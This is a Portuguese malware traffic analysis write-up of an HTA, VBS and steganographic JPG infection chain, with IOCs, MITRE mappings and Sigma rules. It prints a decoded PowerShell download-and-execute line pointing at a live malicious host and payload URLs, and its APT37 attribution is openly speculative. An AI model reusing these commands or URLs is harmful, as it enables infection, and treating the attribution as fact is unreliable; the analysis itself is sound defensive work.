
CVE-2017-0199 XLS --> HTA --> VBS --> ESTEGANOGRAFIA --> MALWARE DO TIPO DBATLOADER/GULOADER
Análise Baseada em PCAP | Data: 2025-03-12 | Autor: BlackOclock
14.1 Resumo Completo da Cadeia de Ataque
14.2 Indicadores de Comprometimento (IPs, Hashes, Domínios)
14.3 Recomendações
NOTA!!! Nesta análise, foi utilizado 'APENAS' o arquivo PCAP! Os arquivos ZIP não foram necessários;
##1. VISÃO GERAL DA ANÁLISE

Figura 1: arquivos de origem baixados em malware-traffic-analysis.net - foi utilizado 'APENAS' o arquivo PCAP
2025-01-09 (QUINTA-FEIRA): CVE-2017-0199 XLS --> HTA --> VBS --> ESTEGANOGRAFIA --> MALWARE ESTILO DBATLOADER/GULOADER
##2. ANÁLISE DO TRÁFEGO DE REDE
2.1-Hierarquia de Protocolos – Visão Geral

Comecei com a Hierarquia de Protocolos para obter uma visão geral do tráfego. Isso mostra o volume de cada protocolo utilizado. Conforme mostrado na figura, o TLS representa 82,4% de todo o tráfego. Além disso, também estão presentes dados de Media Line e Line-Based. No entanto, para entender melhor a atividade de rede, precisamos examinar Conversas e Endpoints.
2.2-Conversas – Principais Comunicadores & Transferência de Dados

Usamos Conversas para detectar pares de IP que têm a maior transferência de dados entre si. A análise mostra que 10.9.1.101 (host) e 104.17.201.1 têm o maior volume de tráfego. As portas 80 e 443 foram usadas para essa transferência de dados. Além disso, vemos que 3 MB de dados foram transferidos para 10.9.1.101 (host) a partir de 104.17.201.1. Outra descoberta crítica é a conexão na porta 21 devido à conexão do IP WAN (89.39.83.184), o que sugere possível exfiltração. Mas ainda não temos certeza, pois ainda não sabemos sobre isso. Precisamos de uma prova!
2.3- Endpoints

Usamos Endpoints para identificar os principais comunicadores na rede. 104.17.201.1 tem 3MB de dados transmitidos (Tx) e também 10.9.1.101 tem 3MB de dados recebidos (Rx). Além disso, os principais comunicadores são 104.17.201.1 como origem e 10.9.1.101 como destino.
2.4- Objetos de Exportação HTTP

A Exportação é usada para identificar arquivos, dados, e-mails, etc. transferidos pela rede. Sempre que analisamos um pcap, devemos verificar aqui para ver quais pacotes contêm quais dados. Bem, observamos os pacotes 88, 132, 2457 e 2468.
2.5- Filtro HTTP Contains

Se houver protocolos HTTP na rede. Devemos verificar png, zip, jpg, jpeg (Esteganografia) como mídia no filtro, pois os atacantes costumam usar códigos maliciosos em arquivos de mídia para contornar a detecção de antivírus.
#Exemplo: http contains ".png" ou http contains ".jpg" ou http contains ".jpeg" ou http contains ".zip"
Apenas estamos vendo por que esse filtro é importante quando a porta 80 é usada na rede. Aqui há um .hta que foi enviado em arquivos de mídia no pacote 47. Mas quando usamos a exportação para identificar arquivos, não havia.
##3. ANÁLISE COM NETWORKMINER

Podemos usar o networkminer para identificar mais rapidamente no PCAP. Se você usa REMnux ou sistema Linux, pode escrever no terminal (networkminer pcap_name)
Frame = 47 | Nome do arquivo = seemebestthingsevermeetgivenbestthingsfornewways | Extensão = .hta | Tamanho = 47 KB | IP de Origem = 192.3.27.144 Frame = 132 | Nome do arquivo = comonstraints | Extensão = .vbs | Tamanho = 223 KB | IP de Origem = 107.172.31.5 Frame = 2457 | Nome do arquivo = foeMMBIG | Extensão = .txt | Tamanho = 325 KB | IP de Origem = 107.172.31.5

Hashes JA3:
06843d66057fc9cbe42e9d690308903 (Frame 8)62136a81b5b727d039d8160d188863aa (Frame 14)3c4eb72b882d4d1442c67ce73f1292a9 (Frame 140)Impressões Digitais JA4:
t13d1516h2_8daaf6152771_02713d6af862t13d201000_2b729b4bf63_29829a46703fBem, mas por que precisamos dos hashes JA4 e JA3? Pode surgir a pergunta: o que são JA3 e JA4?
Deixe-me explicar; JA3 e JA4 são técnicas usadas para fingerprint de clientes e servidores TLS com base nos parâmetros do handshake TLS. O JA3 cria um hash MD5 do pacote client hello do handshake TLS, identificando exclusivamente o aplicativo cliente (ex.: navegador, malware).
JA4 é uma técnica mais recente. É como uma impressão digital para o tráfego da internet. Assim como os humanos têm impressões digitais únicas, todo software que se conecta à internet deixa uma marca única. Mais útil para encontrar servidores C2.
##4. ANÁLISE DE LOGS ZEEK (ZUI)
Logs do Zeek foram usados para verificar os arquivos extraídos do tráfego HTTP. O files.log mostra as seguintes entradas:
Esses hashes foram posteriormente usados para consultas no VirusTotal.

Hta (seemebestthing…)
MD5 e90ae8ec16ea2056caaa64ac13a31373 SHA1 8041abda3769b97d8e8b980c6a77fcd2829d715 SHA256 df215a01f6a83014a148c6e407cdc8422e9119a88b4220a1321b2986ea9aef63

MD5 3f691c4d5e1b53d16964d30e35863f77 SHA1 9ade8197b6f8828f384d5431a1d3a1b00e162782 SHA256 a666a99f2056082802f4597f180f891582a527324a16d34b4755ed63e5467882

MD5 9409dc8763c7d40af120ad693545ef98 SHA1 bec5f3f43449189ebf5dadf314288acace4828d7 SHA256 018648727f760e361eb4efa7f955a7815a197224c23016b321ab954767b45b82
##5. ARQUIVOS EXTRAÍDOS & ANÁLISE ESTÁTICA
Aqui vamos exportar todos os arquivos do pcap para a área de trabalho e analisaremos com o binwalk

O arquivo HTA parece limpo. Não consegui encontrar nenhum dado oculto. Parece um arquivo de texto normal.
O arquivo VBS é diferente. Encontrei duas coisas dentro:
Alguns dados Base64 e um documento HTML Isso significa que o arquivo VBS possui várias camadas. O atacante tentou esconder código dentro dele.
O arquivo TXT me deu uma saída estranha. Diz "Broadcom header", o que não faz sentido para um arquivo de texto. Talvez o arquivo esteja corrompido, ou haja outra camada dentro. Preciso executá-lo em um sandbox para entender mais
##6. TRIAGEM & ANÁLISE COMPORTAMENTAL
Executei o arquivo HTA em um sandbox. Aqui está o que aconteceu:

Temos o resultado do hta. Pontuação 8/10 pelo Triage.

Cadeia de processos com 5 etapas: mshta.exe (PID 1080) iniciou Ele lançou cmd.exe (4952) cmd.exe lançou powershell.exe (4424) PowerShell habilitou SeDebugPrivilege (para acessar outros processos) WriteProcessMemory foi usado várias vezes para injeção de código
Cadeia de injeção:
mshta.exe (1080) → cmd.exe (4952) → powershell.exe (4424) → csc.exe (4432) → processo desconhecido (3332)
PowerShell também verificou processos em execução (descoberta) e consultou o idioma do sistema (provavelmente para evitar sandboxes).
Técnicas MITRE que vi para hta :
T1059.001 (PowerShell) T1059.003 (cmd) T1057 (descoberta de processos) T1134 (manipulação de token) T1055 (injeção de processo) T1614.001 (detecção de idioma)

bem, vemos aqui FromString64Base no comando PowerShell pelo cmd.exe. Temos que decodificá-lo no CyberChef para ver o código em base64.

No comando PowerShell, encontrei uma string Base64. Após decodificá-la com o CyberChef, vi isto:
URLDownloadToFile(0, "http://107.172.31.5/comonstraints.vbs", "...", 0, 0) Start-Sleep(3) Invoke-Expression "..."
então isso significa que, a partir de 107.172.31.5, baixar comonstraints.vbs e 3 segundos de espera e executar. Bem, no próximo passo, comonstraints.vbs será baixado.

Temos o resultado do vbs. Pontuação 10/10 pelo Triage.
Cadeia de processos: Wscript.exe executou e lançou PowerShell.exe
Bem, na imagem, se verificarmos os códigos no processo. Podemos ver #x#.GIBMMeof/5.13.271.701//:p##h ----> Há um caminho codificado. http://107.172.31.5/foeMMBIG.txt (que foi visto na exportação do PCAP)
e também este site https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg, que contém código malicioso dentro do jpg. O JPG possui tags <BASE64_START> e <BASE64_END>. Entre elas, então significa que há código oculto. O texto oculto é na verdade Base64, mas escrito ao contrário. O script o inverte primeiro, depois o decodifica. Após a decodificação, ele se torna um pequeno programa (assembly .NET) e é executado no computador.
Tentei baixar o jpg.

Mas não consegui obtê-lo. Talvez este endereço tenha sido fechado. O arquivo VBS baixa uma imagem, encontra código oculto dentro dela, corrige e o executa. Isso é chamado de esteganografia – ocultar coisas dentro de imagens.
Técnicas MITRE:
T1012 - Consulta ao Registro T1082 - Descoberta de Informações do Sistema T1055 - Injeção de Processo T1057 – Descoberta de Processos T1134 – Manipulação de Token de Acesso

-O arquivo foi aberto com Notepad.exe (PID 4600)
Isso confirma que foeMMBIG.txt é na verdade um dropper de ransomware.
Técnicas MITRE:
##7. ANÁLISE DE INJEÇÃO DE PROCESSOS
7.1 Árvore de Processos
mshta.exe (1080) → cmd.exe (4952) → powershell.exe (4424) → csc.exe (4432) → Notepad.exe (4600)
7.2 Eventos de WriteProcessMemory
PID 1080 (mshta.exe) escreveu no PID 4952 (cmd.exe) PID 4952 (cmd.exe) escreveu no PID 4424 (powershell.exe) PID 4424 (powershell.exe) escreveu no PID 4432 (csc.exe) PID 4432 (csc.exe) escreveu no PID 3332 (desconhecido)
7.3 Manipulação de Token
PowerShell (PID 4424) habilitou SeDebugPrivilege, permitindo acessar outros processos.
##8. ANÁLISE DE DUMP DE MEMÓRIA
Quando o malware foi executado, o sandbox tirou snapshots da memória do PowerShell (PID 4424). Esses snapshots salvam o que estava na RAM do computador naquele momento.
Encontrei mais de 20 arquivos de dump de memória

O arquivo VBS (executado pelo WScript.exe, PID 1184) também criou dumps de memória. Esses dumps têm em sua maioria 64 KB de tamanho. Isso é normal para pequenas alocações. Mas verifiquei se havia dumps de memória do Notepad.exe (PID 4600), mas não havia nenhum. Isso é interessante porque sabemos que o Notepad foi usado para abrir o foeMMBIG.txt.
##9. DETECÇÃO E FINGERPRINT DE C2

Apenas Jarm foi impresso a partir de 2 IPs
Extraí impressões digitais JA4 do NetworkMiner e as pesquisei no GreyNoise. Encontrei 26 IPs sinalizados como maliciosos com a mesma impressão digital JA4. Em seguida, pesquisei todos esses IPs no Shodan para verificar suas portas e serviços abertos.
Esta lista foi criada verificando o GreyNoise, e esses IPs estão sinalizados como maliciosos no GreyNoise:
34.122.147.229 ( Tentativas de brute-force de login em aplicações web - de acordo com a fonte Guardpot - 7 meses atrás Este IP esteve envolvido em 1222 eventos em 2 tipos distintos de ataque. Ataques: tcp-portscan (1177), fortinet-login (45). Primeira vez visto: 2024-05-07 23:10 UTC, Última vez visto: 2025-07-17 17:28 UTC. 3/94 fornecedores de segurança sinalizaram este endereço IP como malicioso. Not After: 2020-11-30 22:10:40 )
107.189.1.175 - resultado do shodan C: Luxemburgo Org : Buy VM Portas Abertas: 80 / 443 / 9001 / 9030
104.197.69.115 ( Tentativas de brute-force de login em aplicações web - de acordo com a fonte Guardpot - 5 meses atrás Este IP esteve envolvido em 1159 eventos em 2 tipos distintos de ataque. Ataques: tcp-portscan (1124), fortinet-login (35). Primeira vez visto: 2024-07-11 04:26 UTC, Última vez visto: 2025-09-25 12:08 UTC. 4/94 fornecedores de segurança sinalizaram este endereço IP como malicioso )
34.72.176.129 ( Tentativas de brute-force de login em aplicações web - de acordo com a fonte Guardpot - 5 meses atrás
Este IP esteve envolvido em 1233 eventos em 2 tipos distintos de ataque. Ataques: tcp-portscan (1201), fortinet-login (32). Primeira vez visto: 2024-07-11 04:26 UTC, Última vez visto: 2025-09-25 12:12 UTC.
Encontre mais informações no CrowdSec CTI - de acordo com a fonte CrowdSec - 1 ano atrás
Comportamentos: Tentativa de exploração / HTTP Bruteforce / HTTP Crawl + 2 mais. Detalhes completos no CrowdSec CTI
6/94 fornecedores de segurança sinalizaram este endereço IP como malicioso
34.123.170.104 ( Tentativas de brute-force de login em aplicações web - de acordo com a fonte Guardpot - 1 mês atrás Este IP esteve envolvido em 1141 eventos em 3 tipos distintos de ataque. Ataques: tcp-portscan (1097), fortinet-login (42), web-login (2). Primeira vez visto: 2024-05-23 14:07 UTC, Última vez visto: 2026-01-26 05:22 UTC. Encontre mais informações no CrowdSec CTI - de acordo com a fonte CrowdSec - 1 ano atrás Comportamentos: HTTP Crawl / HTTP DoS / HTTP Exploit + 1 mais. Detalhes completos no CrowdSec CTI ) 3/94 fornecedores de segurança sinalizaram este endereço IP como malicioso
121.127.42.69 ( 3/94 fornecedores de segurança sinalizaram este endereço IP como malicioso)
185.220.101.2 resultado do shodan ( Hostnames:berlin01.tor-exit.artikel10.org País : Alemanha Organização: Artikel10 e.V. ISP : Stiftung Erneuerbare Freiheit (É TOR) Portas : 80/443/9001/9002
185.220.101.162 ( Hostnames: tor-exit-162.relayon.org País : Alemanha / Organização: CIA TRIAD SECURITY LLC ISP : Stiftung Erneuerbare Freiheit)
205.169.39.24 Varredura de portas de rede e reconhecimento - de acordo com a fonte Guardpot - 8 meses atrás Este IP esteve envolvido em 86 eventos em 1 tipo distinto de ataque. Ataques: tcp-portscan (86). Primeira vez visto: 2024-08-22 22:29 UTC, Última vez visto: 2025-07-04 17:29 UTC.
47.254.76.66 ( Provedor de Nuvem : Alibaba Cloud País : EUA portas abertas : 22 Sistema operacional : Linux
47.251.118.89 (Provedor de Nuvem : Alibaba Cloud País : EUA portas abertas : 22 Sistema operacional : Linux)
107.189.12.7( Hostnames : tor.privatebrowsing.org País Luxemburgo portas abertas: 80)
47.88.18.245 ( País EUA SO: Linux porta aberta : 22)
79.127.248.2 ( 4/94 fornecedores de segurança sinalizaram este endereço IP como malicioso País EUA)
185.126.82.201( País : EUA porta : 1080)
45.92.19.139 (País : EUA porta : 59511)
47.251.186.126( País : EUA porta : 22)
79.127.221.66 (País : EUA porta : 1080)
185.241.208.136 ( País: Polônia Hostnames ns2.rdp.rs portas abertas : 111/8440/9001)
47.89.246.29 ( País : EUA porta : 22)
185.220.101.110 ( Hostnames: tor-exit-110.digitalcourage.de portas abertas : 80/123/443/8080)
5.77.252.202 ( Hostnames :host-202.252.77.5.ucom.am País : Armênia portas abertas : 1701/8291)
124.198.132.172(Tor) ( País : EUA portas abertas : 111/8110/9001)
185.220.101.9 (Tor) ( HostName : berlin01.tor-exit.artikel10.org País : Polônia portas abertas : 80/443/9001/9002)
213.230.93.13 ( 4/94 fornecedores de segurança sinalizaram este endereço IP como malicioso País : Uzbequistão)
138.199.140.203 ( hostname :static.203.140.199.138.clients.your-server.de País : Alemanha Portas Abertas : 22 / 8080 / 8443 / 9090/ 9100 / 10000 / 10250)
##10. ANÁLISE DE EXFILTRAÇÃO
Quando verificamos 89.39.83.184, vemos que este ip se conectou na porta 21 com o host. Se clicarmos em um dos pacotes no ftp 21 e Follow --- > TCP STREAM, vemos o e-mail e a senha do atacante

quando verificamos os arquivos no networkminer, havia os números de pacote 2498 (PW_user1_DESKTOP.html) e 2516 (Contacts_Thunder.txt). Após exportar esses arquivos, há informações de nome de usuário e senha para ataque de phishing (acho eu) ou roubo de contas.

Pesquisei o IP do servidor FTP (89.39.83.184) no Shodan para aprender mais sobre a infraestrutura do atacante.

##12. INTELIGÊNCIA DE AMEAÇAS
12.1 Resultados do VirusTotal & MalwareBazaar
Os hashes obtidos dos logs do Zeek (Seção 4) foram verificados no VirusTotal e no MalwareBazaar. Todos os arquivos foram confirmados como maliciosos:
Arquivo HTA: 33/61 detecção, identificado como AgentTesla Arquivo VBS: 31/62 detecção, identificado como AgentTesla / Talu Arquivo TXT: 25/62 detecção, identificado como Zapchast / Bhgd (dropper de ransomware)
Veja a Seção 14.2 para a lista completa de hashes.
12.2 Mapeamento MITRE ATT&CK
T1059.001 - PowerShell T1059.003 - cmd T1134 - manipulação de token T1614.001 - detecção de idioma T1012 - Consulta ao Registro T1082 - Descoberta de Informações do Sistema T1055 - Injeção de Processo T1057 – Descoberta de Processos
12.3 Correlação com APT37 (ScarCruft)
Por que este ataque se parece com APT37?
O que vimos neste ataque - APT37 é conhecido por Arquivo HTA usado para iniciar a infecção - APT37 usa muito arquivos HTA PowerShell com comandos base64 - APT37 adora PowerShell Esteganografia (JPG com código oculto) - APT37 esconde código em imagens Injeção de processo (mshta → cmd → powershell → csc) - APT37 injeta código em processos confiáveis Exfiltração por FTP de dados roubados - APT37 rouba credenciais e arquivos Ransomware no final - APT37 agora também usa ransomware Alvos talvez na Europa - APT37 está ativo na Europa Conclusão As técnicas que vimos neste ataque correspondem ao que a APT37 costuma fazer. Não é 100% prova, mas parece APT37. Provavelmente um grupo hacker norte-coreano está por trás disso.
##13. ENGENHARIA DE DETECÇÃO
title: SeDebugPrivilege no PowerShell description: Detecta PowerShell habilitando SeDebugPrivilege (possível manipulação de token) logsource: category: process_creation product: windows detection: selection: Image|endswith: '\powershell.exe' CommandLine|contains: 'SeDebugPrivilege' condition: selection
title: Exfiltração via FTP description: Detecta conexões FTP a partir de processos que não deveriam usar FTP logsource: category: network_connection product: windows detection: selection: Image|endswith: - '\powershell.exe' - '\cmd.exe' - '\wscript.exe' DestinationPort: 21 condition: selectiontitle: Download do PowerShell description: Detecta o PowerShell baixando arquivos da internet logsource: category: process_creation product: windows detection: selection: Image|endswith: '\powershell.exe' CommandLine|contains|all: - 'URLDownloadToFile' - 'http' condition: selection
title: Notepad a partir de Temp description: Detecta o Notepad abrindo arquivos da pasta Temp (possível injeção de processo) logsource: category: process_creation product: windows detection: selection: Image|endswith: '\notepad.exe' CommandLine|contains: '\Temp' condition: selection
NOTA! Eu sei que isso é básico, mas estou apenas tentando aprender regras Sigma.
##14. CONCLUSÃO E IOCs
14.1 Resumo da Cadeia de Ataque Completa
A infecção começou com um arquivo HTA malicioso baixado de 192.3.27.144. Quando aberto, iniciou uma cadeia de processos:
mshta.exe → cmd.exe → powershell.exe → csc.exe → Notepad.exe
Principais descobertas:
<BASE64_START> e <BASE64_END>.
O script extraiu esses dados, reverteu-os e decodificou-os em um assembly .NET. Este assembly foi carregado na memória e executado. Embora não tenhamos conseguido baixar o JPG (erro 401), o código sugere fortemente que este foi o mecanismo que baixou o payload final (foeMMBIG.txt).Ator da ameaça: APT37 – técnicas correspondem a TTPs conhecidas
14.2 Indicadores de Compromisso
Endereços IP:
IP = 107.172.31.5 | Função = Servidor C2 (VBS, download TXT) IP = 89.39.83.184 | Função = Servidor de exfiltração FTP IP = 192.3.27.144 | Função = Fonte de download do HTA IP = 104.17.201.1 | Função = Download do primeiro estágio (3 MB) 25 IPs maliciosos do GreyNoise | Ver lista completa na Seção 9.2
Domínios:
Domínio = res.cloudinary.com Função= Esteganografia (JPG com código oculto) Domínio = ip-api.com Nome do arquivo= index.B23BDC8E.txt(false) Função = Evasão de sandbox
Hashes de Arquivos:
(seemebestbest…).hta MD5 e90ae8ec16ea2056caaa64ac13a31373 SHA1 8041abda3769b97d8e8b980c6a77fcd2829d715 SHA256 df215a01f6a83014a148c6e407cdc8422e9119a88b4220a1321b2986ea9aef63
comostraints.vbs MD5 3f691c4d5e1b53d16964d30e35863f77 SHA1 9ade8197b6f8828f384d5431a1d3a1b00e162782 SHA256 a666a99f2056082802f4597f180f891582a527324a16d34b4755ed63e5467882
foeMMBIG.txt MD5 9409dc8763c7d40af120ad693545ef98 SHA1 bec5f3f43449189ebf5dadf314288acace4828d7 SHA256 018648727f760e361eb4efa7f955a7815a197224c23016b321ab954767b45b82
Credenciais FTP:
14.3 Recomendações